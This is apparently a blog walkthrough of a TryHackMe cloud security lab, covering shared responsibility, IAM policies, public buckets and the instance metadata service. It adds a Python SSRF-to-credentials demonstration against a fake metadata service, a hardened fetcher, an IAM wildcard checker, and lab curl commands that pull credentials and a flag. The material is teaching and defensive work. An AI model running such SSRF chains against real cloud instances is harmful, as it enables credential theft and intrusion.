June 13, 2026
Cloud Security Fundamentals | TryHackMe | practical lab
Learn cloud security fundamentals and walk a guided, cloud-agnostic attack chain end to end.
Jose Praveen
3 min read
This room will present the concepts in a cloud-agnostic way. Each task will introduce concepts using generic terms that convey the same general idea across different clouds. The flow will cover service deployment models, identity, storage, networking, and compute. You will also have a practical, hands-on exercise at the end in a simulated cloud environment that will walk you through port scanning, pivoting, SSRF chaining, and exfiltration.
Learning Objectives
- Explain the Shared Responsibility Model and map responsibilities across IaaS, PaaS, and SaaS
- Read an IAM policy, identify roles as the attackable primitive, and spot an over-permissive wildcard
- Recognize publicly exposed cloud storage and articulate how an attacker enumerates it
- Describe cloud networking primitives and common exposed-service and lateral-movement patterns
- Explain the Instance Metadata Service and the SSRF-to-credentials attack chain
- Walk a guided, cloud-agnostic attack against a simulated cloud environment
Type: Walkthrough
Role: Cloud Security Analyst
Difficulty: Easy
Link: https://tryhackme.com/room/cloudsecurityfundamentals
A company runs its own web stack on a cloud virtual machine but does not manage the physical hardware. Which service model describes this arrangement?
IaaS
In the Shared Responsibility Model, who is always responsible for securing the physical datacentre and hardware?
Provider
In an IAM policy statement, which field states whether access is allowed or denied?
Effect
A named, temporary bundle of permissions that an identity can assume is called what?
Role
A bucket policy that sets "Principal": "*" effectively makes the bucket what? (one word, used throughout this task)
Public
From the list of artifacts worth prioritizing in an open bucket, which single type tends to hold the most sensitive data in one file?
Backups
In a security group rule, which CIDR notation indicates a port is open to the entire Internet?
0.0.0.0/0
What two-word term describes moving from one compromised instance to another reachable service inside the same virtual network using the same permissions?
Lateral movement
What is the link-local IP address AWS and Azure use for the Instance Metadata Service?
169.254.169.254
Which IMDS version responds to a plain HTTP GET with no session token, making it vulnerable to classic SSRF?
IMDSv1
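The SSRF-to-credentials chain the questions above describe, as an added Python example that is not part of the room or its ImageFetcher application: a fake metadata service on loopback that can behave like IMDSv1 (a plain GET returns the role credentials) or IMDSv2 (a PUT must first obtain a session token, which every GET then has to carry), an ImageFetcher-style handler that fetches whatever URL the user supplies, and a hardened version of that handler that resolves the destination and refuses link-local, loopback and private addresses. The role name, credential values and token are constructed; the real service sits at 169.254.169.254, and the fake one binds to 127.0.0.1 only so the example runs offline.

```python
import ipaddress
import json
import socket
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse

# Constructed values: the role name, the credentials the fake IMDS hands out and the
# session token its IMDSv2 mode requires. None of these are real keys.
ROLE_PATH = "/latest/meta-data/iam/security-credentials/staging-role"
FAKE_CREDS = {"AccessKeyId": "AKIACONSTRUCTED00000", "SecretAccessKey": "constructed",
              "Token": "constructed-session"}
V2_TOKEN = "constructed-imdsv2-token"


class FakeIMDS(BaseHTTPRequestHandler):
    """Stand-in for 169.254.169.254. With server.require_token=False it behaves like
    IMDSv1; with True it behaves like IMDSv2 (every GET must carry a token from a PUT)."""

    def log_message(self, *args):  # silence per-request logging
        pass

    def _send(self, code, body=b""):
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_PUT(self):
        # IMDSv2 token endpoint: a PUT with a TTL header issues a session token.
        if self.path == "/latest/api/token" and "X-aws-ec2-metadata-token-ttl-seconds" in self.headers:
            self._send(200, V2_TOKEN.encode())
        else:
            self._send(400)

    def do_GET(self):
        if self.server.require_token and self.headers.get("X-aws-ec2-metadata-token") != V2_TOKEN:
            self._send(401)  # IMDSv2: a plain GET gets nothing
        elif self.path == ROLE_PATH:
            self._send(200, json.dumps(FAKE_CREDS).encode())
        else:
            self._send(404)


class IMDSServer(HTTPServer):
    def __init__(self, require_token):
        super().__init__(("127.0.0.1", 0), FakeIMDS)
        self.require_token = require_token


def start_imds(require_token: bool) -> str:
    """Start a fake IMDS on a free loopback port in a background thread; return its base URL."""
    srv = IMDSServer(require_token)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{srv.server_port}"


def fetch_image_vulnerable(url: str) -> str:
    """ImageFetcher-style handler: fetches whatever URL the user supplies. This is the SSRF."""
    with urllib.request.urlopen(url, timeout=3) as resp:
        return resp.read().decode()


def fetch_image_hardened(url: str) -> str:
    """Same feature, but the destination is resolved and checked before any request is sent."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        raise ValueError("unsupported URL")
    for info in socket.getaddrinfo(parsed.hostname, parsed.port or 80):
        ip = ipaddress.ip_address(info[4][0].split("%")[0])
        if ip.is_link_local or ip.is_loopback or ip.is_private:
            raise ValueError(f"refusing to fetch internal address {ip}")
    return fetch_image_vulnerable(url)


def ssrf_steal_credentials(imds_base: str):
    """Attacker's chain through the vulnerable fetcher: parsed credentials, or None if IMDS refuses."""
    try:
        return json.loads(fetch_image_vulnerable(imds_base + ROLE_PATH))
    except urllib.error.HTTPError:
        return None


def imdsv2_token_then_creds(imds_base: str):
    """The two-step exchange IMDSv2 demands. A GET-only SSRF cannot perform the PUT,
    which is why v2 breaks the classic chain."""
    req = urllib.request.Request(imds_base + "/latest/api/token", method="PUT",
                                 headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"})
    with urllib.request.urlopen(req, timeout=3) as resp:
        token = resp.read().decode()
    req = urllib.request.Request(imds_base + ROLE_PATH, headers={"X-aws-ec2-metadata-token": token})
    with urllib.request.urlopen(req, timeout=3) as resp:
        return json.loads(resp.read().decode())


def hardened_blocks(url: str) -> bool:
    """True when the hardened fetcher refuses the URL."""
    try:
        fetch_image_hardened(url)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    v1 = start_imds(require_token=False)
    print("IMDSv1 via SSRF:", ssrf_steal_credentials(v1))
    v2 = start_imds(require_token=True)
    print("IMDSv2 via plain-GET SSRF:", ssrf_steal_credentials(v2))
    print("IMDSv2 with PUT then GET:", imdsv2_token_then_creds(v2))
    print("Hardened fetcher refuses IMDS:", hardened_blocks(v1 + ROLE_PATH))
```

The hardened fetcher resolves the hostname itself and then lets urllib resolve it again, so a DNS name that rebinds between the two lookups can still reach an internal address; a production fix pins the resolved IP for the actual connection and, on the platform side, enforces IMDSv2 and sets the metadata response hop limit to 1 so a proxied request from inside a container cannot reach the service at all.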
Practical: Attacking a Cloud-Like Environment
A fictional startup has left its staging environment exposed to the internet. In this task, we walk the attack chain end to end: we port-scan the instance, list a public bucket, pivot via SSRF to the metadata service, pull temporary credentials, read an overly permissive IAM policy, and retrieve the final flag. Every step uses nmap and curl on the AttackBox; no provider CLI is required.
Run the port scan. Which port is the ImageFetcher web application running on?
The public bucket contains a file with hints about the next target. What is the filename?
Retrieve the IAM policy. What type of resource is the wildcard present in that provides full access?
curl -H "X-Simulated-Token: AKIATHM1234FAKEKEY0" http://MACHINE_IP:9000/admin/policy.json
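Reading the policy by eye works for one document; the two questions this example serves are the bucket-policy question earlier on the page ("Principal": "*" makes the bucket public) and the IAM-policy question above (a wildcard that grants full access). The following is an added Python example, not code from the room, that walks a policy document statement by statement and reports every over-permissive value in an Allow. Both policy documents are constructed for the example; their bucket name and statements are not the room's.

```python
import json

# Constructed sample: a bucket policy that opens the bucket to anyone ("Principal": "*").
BUCKET_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::staging-assets", "arn:aws:s3:::staging-assets/*"],
    }],
}

# Constructed sample: an identity policy attached to an instance role. Statement 1 is the
# kind of full-access wildcard the practical asks you to spot; statement 2 is a Deny, which
# narrows access and is therefore not a finding.
ROLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::staging-assets/*"},
        {"Effect": "Allow", "Action": "*", "Resource": "*"},
        {"Effect": "Deny", "Action": "iam:*", "Resource": "*"},
    ],
}


def _as_list(value):
    """Action, Resource and Principal may each be a string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principal_is_anyone(principal) -> bool:
    """A Principal of "*" or {"AWS": "*"} means any identity, including anonymous."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any("*" in _as_list(v) for v in principal.values())
    return False


def find_wildcards(policy):
    """Return (statement_index, field, value) for each over-permissive value in an Allow.

    `policy` is a policy document as a dict or a JSON string. Flags a public Principal,
    a bare "*" in Action or Resource, and a whole-service Action such as "s3:*".
    Deny statements are skipped: they only ever remove access."""
    doc = json.loads(policy) if isinstance(policy, str) else policy
    findings = []
    for i, stmt in enumerate(_as_list(doc.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        if _principal_is_anyone(stmt.get("Principal")):
            findings.append((i, "Principal", "*"))
        for field in ("Action", "Resource"):
            for value in _as_list(stmt.get(field)):
                if value == "*" or (field == "Action" and value.endswith(":*")):
                    findings.append((i, field, value))
    return findings


def is_public(policy) -> bool:
    """True when any Allow statement in the document grants access to everyone."""
    return any(field == "Principal" for _, field, _ in find_wildcards(policy))


if __name__ == "__main__":
    for name, pol in (("bucket policy", BUCKET_POLICY), ("role policy", ROLE_POLICY)):
        print(name, "public" if is_public(pol) else "not public", find_wildcards(pol))
```

In the practical the document comes back from the curl command above; feeding its body to find_wildcards as a string gives the same tuples, and the field name in the tuple answers the question of which resource type the wildcard sits in. The checker deliberately treats a resource-level pattern such as arn:aws:s3:::staging-assets/* as scoped, since that is the shape a least-privilege policy is supposed to have.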
Follow the policy to the flag. What is the flag value?
curl -H "X-Simulated-Token: AKIATHM1234FAKEKEY0" http://MACHINE_IP:9000/prod-secrets/flag.txt
The cloud is rented infrastructure. When we say a company "runs in the cloud", we mean it pays a provider (AWS, Azure, Google Cloud, or another) for compute, storage, and networking delivered through an API. Instead of buying servers and racking them in a room, the customer clicks a button and receives a virtual machine minutes later.